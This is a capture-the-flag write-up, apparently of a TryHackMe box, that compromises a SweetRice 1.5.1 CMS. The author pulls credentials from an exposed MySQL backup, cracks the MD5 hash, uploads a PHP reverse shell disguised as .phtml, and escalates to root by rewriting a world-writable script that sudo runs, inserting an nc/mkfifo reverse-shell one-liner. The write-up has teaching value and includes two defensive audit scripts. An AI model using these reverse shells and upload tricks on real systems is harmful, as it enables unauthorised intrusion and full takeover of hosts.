![[Pasted image 20250628172534.png]]
# Target information
- IP: `10.10.7.107`
# Information gathering - Port scanning
TCP scan all ports
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-27 22:47 CDT
Nmap scan report for 10.10.7.107
Host is up (0.13s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 23.14 seconds
```
TCP scan with scripts against ports 22 and 80
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sC -sV $IP -p22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-27 22:49 CDT
Nmap scan report for 10.10.7.107
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.62 seconds
```
The UDP scan revealed no open ports, at least among the top 1,000 ports.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-27 22:52 CDT
Nmap scan report for 10.10.7.107
Host is up (0.13s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT STATE SERVICE
1900/udp closed upnp
3659/udp closed apple-sasl
8000/udp closed irdmi
16974/udp closed unknown
21780/udp closed unknown
42508/udp closed candp
Nmap done: 1 IP address (1 host up) scanned in 1.44 seconds
```
----
# Footprinting
##### Port 80
Accessing 10.10.7.107 displays the default Apache2 Ubuntu landing page, and I couldn't find any interesting info here.
![[Pasted image 20250627230639.png]]
I used `gobuster` to enumerate directories and found `/content`.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.7.107
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/content (Status: 301) [Size: 312] [--> http://10.10.7.107/content/]
```
This is what `/content` looks like; it appears to be running a CMS named `SweetRice`.
![[Pasted image 20250627232612.png]]
I ran another gobuster scan against the directory I had found, `/content`.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ gobuster dir -u http://$IP/content -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.7.107/content
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 319] [--> http://10.10.7.107/content/images/]
/js (Status: 301) [Size: 315] [--> http://10.10.7.107/content/js/]
/inc (Status: 301) [Size: 316] [--> http://10.10.7.107/content/inc/]
/as (Status: 301) [Size: 315] [--> http://10.10.7.107/content/as/]
/_themes (Status: 301) [Size: 320] [--> http://10.10.7.107/content/_themes/]
/attachment (Status: 301) [Size: 323] [--> http://10.10.7.107/content/attachment/]
```
# Exploit
##### SweetRice 1.5.1
I landed on `/as`, which is the SweetRice login page. We'll definitely need to find some credentials to get in.
![[Pasted image 20250627233541.png]]
I looked up SweetRice on searchsploit, and there are some known vulnerabilities we can potentially exploit.
![[Pasted image 20250628154900.png]]
At `/content/inc/latest.txt` I found the following. It most likely indicates the SweetRice version, and that version has several known vulnerabilities.
![[Pasted image 20250628155011.png]]
The SweetRice 1.5.1 entry, `40718.txt`, says that all MySQL backups are accessible and can be downloaded from a directory.
![[Pasted image 20250628164131.png]]
I downloaded this MySQL backup file from that directory. It contains the highly valuable information we were looking for: the admin's username and a hashed password, which I suspected was an MD5 hash.
```
\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\";
```
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Downloads]
└─$ cat mysql_bakup_20191129023059-1.5.1.sql
<?php return array (
0 => 'DROP TABLE IF EXISTS `%--%_attachment`;',
1 => 'CREATE TABLE `%--%_attachment` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`post_id` int(10) NOT NULL,
`file_name` varchar(255) NOT NULL,
`date` int(10) NOT NULL,
`downloads` int(10) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;',
2 => 'DROP TABLE IF EXISTS `%--%_category`;',
3 => 'CREATE TABLE `%--%_category` (
`id` int(4) NOT NULL AUTO_INCREMENT,
`name` varchar(255) NOT NULL,
`link` varchar(128) NOT NULL,
`title` text NOT NULL,
`description` varchar(255) NOT NULL,
`keyword` varchar(255) NOT NULL,
`sort_word` text NOT NULL,
`parent_id` int(10) NOT NULL DEFAULT \'0\',
`template` varchar(60) NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `link` (`link`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;',
4 => 'DROP TABLE IF EXISTS `%--%_comment`;',
5 => 'CREATE TABLE `%--%_comment` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`name` varchar(60) NOT NULL DEFAULT \'\',
`email` varchar(255) NOT NULL DEFAULT \'\',
`website` varchar(255) NOT NULL,
`info` text NOT NULL,
`post_id` int(10) NOT NULL DEFAULT \'0\',
`post_name` varchar(255) NOT NULL,
`post_cat` varchar(128) NOT NULL,
`post_slug` varchar(128) NOT NULL,
`date` int(10) NOT NULL DEFAULT \'0\',
`ip` varchar(39) NOT NULL DEFAULT \'\',
`reply_date` int(10) NOT NULL DEFAULT \'0\',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;',
6 => 'DROP TABLE IF EXISTS `%--%_item_data`;',
7 => 'CREATE TABLE `%--%_item_data` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`item_id` int(10) NOT NULL,
`item_type` varchar(255) NOT NULL,
`data_type` varchar(20) NOT NULL,
`name` varchar(255) NOT NULL,
`value` text NOT NULL,
PRIMARY KEY (`id`),
KEY `item_id` (`item_id`),
KEY `item_type` (`item_type`),
KEY `name` (`name`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;',
8 => 'DROP TABLE IF EXISTS `%--%_item_plugin`;',
9 => 'CREATE TABLE `%--%_item_plugin` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`item_id` int(10) NOT NULL,
`item_type` varchar(255) NOT NULL,
`plugin` varchar(255) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;',
10 => 'DROP TABLE IF EXISTS `%--%_links`;',
11 => 'CREATE TABLE `%--%_links` (
`lid` int(10) NOT NULL AUTO_INCREMENT,
`request` text NOT NULL,
`url` text NOT NULL,
`plugin` varchar(255) NOT NULL,
PRIMARY KEY (`lid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;',
12 => 'DROP TABLE IF EXISTS `%--%_options`;',
13 => 'CREATE TABLE `%--%_options` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`name` varchar(255) NOT NULL,
`content` mediumtext NOT NULL,
`date` int(10) NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `name` (`name`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;',
14 => 'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin's Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\"Description\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\";s:5:\\"close\\";i:1;s:9:\\"close_tip\\";s:454:\\"<p>Welcome to SweetRice - Thank your for install SweetRice as your website management system.</p><h1>This site is building now , please come late.</h1><p>If you are the webmaster,please go to Dashboard -> General -> Website setting </p><p>and uncheck the checkbox \\"Site close\\" to open your website.</p><p>More help at <a href=\\"http://www.basic-cms.org/docs/5-things-need-to-be-done-when-SweetRice-installed/\\">Tip for Basic CMS SweetRice installed</a></p>\\";s:5:\\"cache\\";i:0;s:13:\\"cache_expired\\";i:0;s:10:\\"user_track\\";i:0;s:11:\\"url_rewrite\\";i:0;s:4:\\"logo\\";s:0:\\"\\";s:5:\\"theme\\";s:0:\\"\\";s:4:\\"lang\\";s:9:\\"en-us.php\\";s:11:\\"admin_email\\";N;}\',\'1575023409\');',
15 => 'INSERT INTO `%--%_options` VALUES(\'2\',\'categories\',\'\',\'1575023409\');',
16 => 'INSERT INTO `%--%_options` VALUES(\'3\',\'links\',\'\',\'1575023409\');',
17 => 'DROP TABLE IF EXISTS `%--%_posts`;',
18 => 'CREATE TABLE `%--%_posts` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`name` varchar(255) NOT NULL,
`title` varchar(255) NOT NULL,
`body` longtext NOT NULL,
`keyword` varchar(255) NOT NULL DEFAULT \'\',
`tags` text NOT NULL,
`description` varchar(255) NOT NULL DEFAULT \'\',
`sys_name` varchar(128) NOT NULL,
`date` int(10) NOT NULL DEFAULT \'0\',
`category` int(10) NOT NULL DEFAULT \'0\',
`in_blog` tinyint(1) NOT NULL,
`views` int(10) NOT NULL,
`allow_comment` tinyint(1) NOT NULL DEFAULT \'1\',
`template` varchar(60) NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `sys_name` (`sys_name`),
KEY `date` (`date`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;',
);?>
```
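As an added example (not part of the original writeup), here is a small parser for the PHP `serialize()` format that SweetRice uses for the `global_setting` row, run over a constructed, shortened copy of the blob from the dump above with the SQL escaping removed. It pulls out the admin username and stored hash and checks whether the hash has the shape of a bare 32-character MD5 digest, which is exactly why a plain lookup service could reverse it.

```python
import re

# Constructed sample: the global_setting value from the backup above, with the
# SQL escaping (\") removed and unrelated keys dropped so it stays short.
SAMPLE = (
    'a:5:{s:6:"author";s:10:"Lazy Admin";s:5:"admin";s:7:"manager";'
    's:6:"passwd";s:32:"42f749ade7f9e195bf475f37a44cafcb";s:5:"close";i:1;'
    's:11:"admin_email";N;}'
)
HEX_MD5 = re.compile(r"^[0-9a-f]{32}$")

def unserialize(data, pos=0):
    """Parse one PHP-serialized value at data[pos]; return (value, next_pos).
    Handles the types SweetRice's settings use: a (array), s (string), i (int),
    b (bool), N (null). PHP string lengths are byte counts (ASCII here)."""
    t = data[pos]
    if t == "N":                               # N;
        return None, pos + 2
    if t in "ib":                              # i:123;  b:1;
        end = data.index(";", pos)
        n = int(data[pos + 2:end])
        return (bool(n) if t == "b" else n), end + 1
    if t == "s":                               # s:6:"passwd";
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                      # skip ':"'
        return data[start:start + length], start + length + 2  # skip '";'
    if t == "a":                               # a:5:{key;value;...}
        colon = data.index(":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                        # skip ':{'
        result = {}
        for _ in range(count):
            key, pos = unserialize(data, pos)
            value, pos = unserialize(data, pos)
            result[key] = value
        return result, pos + 1                 # skip '}'
    raise ValueError(f"unsupported PHP type {t!r} at offset {pos}")

def admin_credentials(blob):
    """Return the admin user, the stored hash, and whether it looks like an unsalted MD5."""
    settings, _ = unserialize(blob)
    pw = settings.get("passwd", "")
    return {
        "user": settings.get("admin"),
        "hash": pw,
        "looks_like_unsalted_md5": bool(HEX_MD5.match(pw)),
    }
```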
`crackstation.net`, a popular free hash cracker, did crack the password, and the hash type was in fact MD5.
![[Pasted image 20250628164506.png]]
I successfully logged in with the credentials found.
![[Pasted image 20250628165244.png]]
In the `Media Center` tab there's a file upload feature, which we can possibly take advantage of to upload a PHP web shell.
![[Pasted image 20250628165955.png]]
I downloaded the well-known `Pentest Monkey` PHP reverse shell.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/refs/heads/master/php-reverse-shell.php
--2025-06-28 16:57:46-- https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/refs/heads/master/php-reverse-shell.php
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.110.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5491 (5.4K) [text/plain]
Saving to: ‘php-reverse-shell.php’
php-reverse-shell.php 100%[===========================================>] 5.36K --.-KB/s in 0s
2025-06-28 16:57:51 (42.7 MB/s) - ‘php-reverse-shell.php’ saved [5491/5491]
```
Modify the reverse shell so that it connects back to your own listener.
![[Pasted image 20250628165853.png]]
Then I uploaded the file. Notice that the file extension has been changed to `.phtml`: I changed it because the web server appears not to accept `.php` files.
![[Pasted image 20250628170531.png]]
Navigating to `/content/attachment`, I found the web shell we had just uploaded!
![[Pasted image 20250628170710.png]]
Got the shell.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.23.133.183] from (UNKNOWN) [10.10.236.234] 54282
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
01:07:27 up 1:37, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$
```
At `/home/itguy`, I found the user flag.
```bash
www-data@THM-Chal:/home/itguy$ ls
ls
Desktop Downloads Pictures Templates backup.pl mysql_login.txt
Documents Music Public Videos examples.desktop user.txt
www-data@THM-Chal:/home/itguy$ cat user.txt
cat user.txt
THM{63e5...
```
# Privilege Escalation
##### sudo -l
`sudo -l` reveals that we can run `/usr/bin/perl /home/itguy/backup.pl` with sudo. I can run `sudo /usr/bin/perl`, but `/home/itguy/backup.pl` has to be the parameter.
```bash
www-data@THM-Chal:/home/itguy$ sudo -l
sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
```
What's inside `/home/itguy/backup.pl`? It contains a very simple script that just runs the `/etc/copy.sh` file.
```bash
www-data@THM-Chal:/home/itguy$ cat /home/itguy/backup.pl
cat /home/itguy/backup.pl
#!/usr/bin/perl
system("sh", "/etc/copy.sh");
```
Then what's inside `/etc/copy.sh`? Interestingly, it contains what appears to be a reverse shell one-liner. Since the file is world-writable (`-rw-r--rwx`), let's change the IP address and port to ours.
```bash
www-data@THM-Chal:/home/itguy$ cat /etc/copy.sh
cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
www-data@THM-Chal:/home/itguy$ ls -l /etc/copy.sh
ls -l /etc/copy.sh
-rw-r--rwx 1 root root 81 Nov 29 2019 /etc/copy.sh
```
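The root cause here is a sudo rule that runs a root-owned script which in turn executes a file anyone can write. As an added defensive check (not from the original writeup), the Python below audits such a sudoers target by following the absolute paths the script references and flagging any that are group- or world-writable; `build_demo()` recreates the page's `backup.pl` / `copy.sh` layout in a temp directory with constructed contents so it runs offline.

```python
import os
import re
import stat
import tempfile

# Absolute paths mentioned in a script body, e.g. system("sh", "/etc/copy.sh");
ABS_PATH = re.compile(r"(?<![\w./-])(/[\w./-]+)")

def writable_by_non_owner(path):
    """Describe group/other write bits on path; None if only the owner can
    write to it or it does not exist."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return None
    bits = []
    if mode & stat.S_IWGRP:
        bits.append("group-writable")
    if mode & stat.S_IWOTH:
        bits.append("world-writable")
    return ", ".join(bits) or None

def audit_sudo_script(script_path):
    """Audit a script that a sudoers rule lets a low-privilege user run as root.
    Flags the script and every absolute path it references that a non-owner
    can modify: each one is a root-executed command that user controls.
    Returns a list of (path, problem) tuples."""
    with open(script_path) as fh:
        body = fh.read()
    findings = []
    for candidate in [script_path] + ABS_PATH.findall(body):
        problem = writable_by_non_owner(candidate)
        if problem:
            findings.append((candidate, problem))
    return findings

def build_demo():
    """Recreate the page's layout in a temp dir: backup.pl (0644) calls copy.sh,
    whose mode 0647 mirrors the -rw-r--rwx /etc/copy.sh seen above."""
    root = tempfile.mkdtemp()
    copy_sh = os.path.join(root, "copy.sh")
    backup_pl = os.path.join(root, "backup.pl")
    with open(copy_sh, "w") as fh:
        fh.write("echo placeholder backup job\n")      # constructed body
    os.chmod(copy_sh, 0o647)
    with open(backup_pl, "w") as fh:
        fh.write(f'#!/usr/bin/perl\nsystem("sh", "{copy_sh}");\n')
    os.chmod(backup_pl, 0o644)
    return audit_sudo_script(backup_pl), copy_sh, backup_pl
```

The fix on a real host is the same as what the audit flags: strip the write bits for group and others from anything a sudo-permitted script executes, and keep those files owned by root.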
I modified `/etc/copy.sh` to match my IP address and port.
```bash
www-data@THM-Chal:/home/itguy$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.23.133.183 2222 >/tmp/f
```
Got the reverse shell as `root` :)
![[Pasted image 20250628172328.png]]
`root.txt`
```bash
# cd /root
# ls
root.txt
# cat root.txt
THM{6637...
```